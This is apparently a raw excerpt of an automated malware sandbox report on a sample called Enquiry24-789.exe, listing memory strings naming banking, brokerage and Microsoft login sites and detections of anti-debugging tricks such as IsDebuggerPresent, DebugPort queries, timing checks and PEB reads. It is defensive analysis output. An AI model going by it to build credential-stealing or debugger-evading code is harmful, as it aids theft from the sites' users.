Source: -NG6N06.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: -NG6N06.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: -NG6N06.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: -NG6N06.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: -NG6N06.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274059679.0000000001399000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2956756147.000001BBD170C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -NG6N06.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: -NG6N06.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: -NG6N06.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: -NG6N06.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: -NG6N06.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: -NG6N06.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: -NG6N06.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: -NG6N06.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: -NG6N06.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547096E rdtsc 2_2_0547096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417E2B LdrLoadDll, 2_2_00417E2B
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4EAA2 BlockInput, 0_2_00C4EAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C02622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C02622
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF4CE8 mov eax, dword ptr fs:[00000030h] 0_2_00BF4CE8
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_023834C0 mov eax, dword ptr fs:[00000030h] 0_2_023834C0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_02383520 mov eax, dword ptr fs:[00000030h] 0_2_02383520
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_02381E70 mov eax, dword ptr fs:[00000030h] 0_2_02381E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438550 mov eax, dword ptr fs:[00000030h] 2_2_05438550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438550 mov eax, dword ptr fs:[00000030h] 2_2_05438550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546656A mov eax, dword ptr fs:[00000030h] 2_2_0546656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546656A mov eax, dword ptr fs:[00000030h] 2_2_0546656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546656A mov eax, dword ptr fs:[00000030h] 2_2_0546656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C6500 mov eax, dword ptr fs:[00000030h] 2_2_054C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E53E mov eax, dword ptr fs:[00000030h] 2_2_0545E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E53E mov eax, dword ptr fs:[00000030h] 2_2_0545E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E53E mov eax, dword ptr fs:[00000030h] 2_2_0545E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E53E mov eax, dword ptr fs:[00000030h] 2_2_0545E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E53E mov eax, dword ptr fs:[00000030h] 2_2_0545E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E5CF mov eax, dword ptr fs:[00000030h] 2_2_0546E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E5CF mov eax, dword ptr fs:[00000030h] 2_2_0546E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054365D0 mov eax, dword ptr fs:[00000030h] 2_2_054365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0546A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0546A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054325E0 mov eax, dword ptr fs:[00000030h] 2_2_054325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C5ED mov eax, dword ptr fs:[00000030h] 2_2_0546C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C5ED mov eax, dword ptr fs:[00000030h] 2_2_0546C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432582 mov eax, dword ptr fs:[00000030h] 2_2_05432582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432582 mov ecx, dword ptr fs:[00000030h] 2_2_05432582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464588 mov eax, dword ptr fs:[00000030h] 2_2_05464588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E59C mov eax, dword ptr fs:[00000030h] 2_2_0546E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B05A7 mov eax, dword ptr fs:[00000030h] 2_2_054B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B05A7 mov eax, dword ptr fs:[00000030h] 2_2_054B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B05A7 mov eax, dword ptr fs:[00000030h] 2_2_054B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054545B1 mov eax, dword ptr fs:[00000030h] 2_2_054545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054545B1 mov eax, dword ptr fs:[00000030h] 2_2_054545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA456 mov eax, dword ptr fs:[00000030h] 2_2_054EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542645D mov eax, dword ptr fs:[00000030h] 2_2_0542645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545245A mov eax, dword ptr fs:[00000030h] 2_2_0545245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BC460 mov ecx, dword ptr fs:[00000030h] 2_2_054BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545A470 mov eax, dword ptr fs:[00000030h] 2_2_0545A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545A470 mov eax, dword ptr fs:[00000030h] 2_2_0545A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545A470 mov eax, dword ptr fs:[00000030h] 2_2_0545A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05468402 mov eax, dword ptr fs:[00000030h] 2_2_05468402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05468402 mov eax, dword ptr fs:[00000030h] 2_2_05468402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05468402 mov eax, dword ptr fs:[00000030h] 2_2_05468402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E420 mov eax, dword ptr fs:[00000030h] 2_2_0542E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E420 mov eax, dword ptr fs:[00000030h] 2_2_0542E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E420 mov eax, dword ptr fs:[00000030h] 2_2_0542E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C427 mov eax, dword ptr fs:[00000030h] 2_2_0542C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A430 mov eax, dword ptr fs:[00000030h] 2_2_0546A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054304E5 mov ecx, dword ptr fs:[00000030h] 2_2_054304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA49A mov eax, dword ptr fs:[00000030h] 2_2_054EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054364AB mov eax, dword ptr fs:[00000030h] 2_2_054364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054644B0 mov ecx, dword ptr fs:[00000030h] 2_2_054644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_054BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546674D mov esi, dword ptr fs:[00000030h] 2_2_0546674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546674D mov eax, dword ptr fs:[00000030h] 2_2_0546674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546674D mov eax, dword ptr fs:[00000030h] 2_2_0546674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430750 mov eax, dword ptr fs:[00000030h] 2_2_05430750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BE75D mov eax, dword ptr fs:[00000030h] 2_2_054BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472750 mov eax, dword ptr fs:[00000030h] 2_2_05472750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472750 mov eax, dword ptr fs:[00000030h] 2_2_05472750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4755 mov eax, dword ptr fs:[00000030h] 2_2_054B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438770 mov eax, dword ptr fs:[00000030h] 2_2_05438770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C700 mov eax, dword ptr fs:[00000030h] 2_2_0546C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430710 mov eax, dword ptr fs:[00000030h] 2_2_05430710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05460710 mov eax, dword ptr fs:[00000030h] 2_2_05460710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C720 mov eax, dword ptr fs:[00000030h] 2_2_0546C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C720 mov eax, dword ptr fs:[00000030h] 2_2_0546C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546273C mov eax, dword ptr fs:[00000030h] 2_2_0546273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546273C mov ecx, dword ptr fs:[00000030h] 2_2_0546273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546273C mov eax, dword ptr fs:[00000030h] 2_2_0546273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AC730 mov eax, dword ptr fs:[00000030h] 2_2_054AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0543C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B07C3 mov eax, dword ptr fs:[00000030h] 2_2_054B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054527ED mov eax, dword ptr fs:[00000030h] 2_2_054527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054527ED mov eax, dword ptr fs:[00000030h] 2_2_054527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054527ED mov eax, dword ptr fs:[00000030h] 2_2_054527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_054BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054347FB mov eax, dword ptr fs:[00000030h] 2_2_054347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054347FB mov eax, dword ptr fs:[00000030h] 2_2_054347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D678E mov eax, dword ptr fs:[00000030h] 2_2_054D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054307AF mov eax, dword ptr fs:[00000030h] 2_2_054307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E47A0 mov eax, dword ptr fs:[00000030h] 2_2_054E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544C640 mov eax, dword ptr fs:[00000030h] 2_2_0544C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F866E mov eax, dword ptr fs:[00000030h] 2_2_054F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F866E mov eax, dword ptr fs:[00000030h] 2_2_054F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A660 mov eax, dword ptr fs:[00000030h] 2_2_0546A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A660 mov eax, dword ptr fs:[00000030h] 2_2_0546A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462674 mov eax, dword ptr fs:[00000030h] 2_2_05462674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE609 mov eax, dword ptr fs:[00000030h] 2_2_054AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472619 mov eax, dword ptr fs:[00000030h] 2_2_05472619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E627 mov eax, dword ptr fs:[00000030h] 2_2_0544E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05466620 mov eax, dword ptr fs:[00000030h] 2_2_05466620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05468620 mov eax, dword ptr fs:[00000030h] 2_2_05468620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543262C mov eax, dword ptr fs:[00000030h] 2_2_0543262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0546A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0546A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_054AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_054AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_054AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_054AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B06F1 mov eax, dword ptr fs:[00000030h] 2_2_054B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B06F1 mov eax, dword ptr fs:[00000030h] 2_2_054B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434690 mov eax, dword ptr fs:[00000030h] 2_2_05434690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434690 mov eax, dword ptr fs:[00000030h] 2_2_05434690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0546C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054666B0 mov eax, dword ptr fs:[00000030h] 2_2_054666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov eax, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov eax, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov ecx, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov eax, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov eax, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C156 mov eax, dword ptr fs:[00000030h] 2_2_0542C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C8158 mov eax, dword ptr fs:[00000030h] 2_2_054C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436154 mov eax, dword ptr fs:[00000030h] 2_2_05436154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436154 mov eax, dword ptr fs:[00000030h] 2_2_05436154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504164 mov eax, dword ptr fs:[00000030h] 2_2_05504164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504164 mov eax, dword ptr fs:[00000030h] 2_2_05504164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 mov ecx, dword ptr fs:[00000030h] 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 mov eax, dword ptr fs:[00000030h] 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 mov eax, dword ptr fs:[00000030h] 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 mov eax, dword ptr fs:[00000030h] 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F0115 mov eax, dword ptr fs:[00000030h] 2_2_054F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05460124 mov eax, dword ptr fs:[00000030h] 2_2_05460124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F61C3 mov eax, dword ptr fs:[00000030h] 2_2_054F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F61C3 mov eax, dword ptr fs:[00000030h] 2_2_054F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055061E5 mov eax, dword ptr fs:[00000030h] 2_2_055061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054601F8 mov eax, dword ptr fs:[00000030h] 2_2_054601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470185 mov eax, dword ptr fs:[00000030h] 2_2_05470185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EC188 mov eax, dword ptr fs:[00000030h] 2_2_054EC188
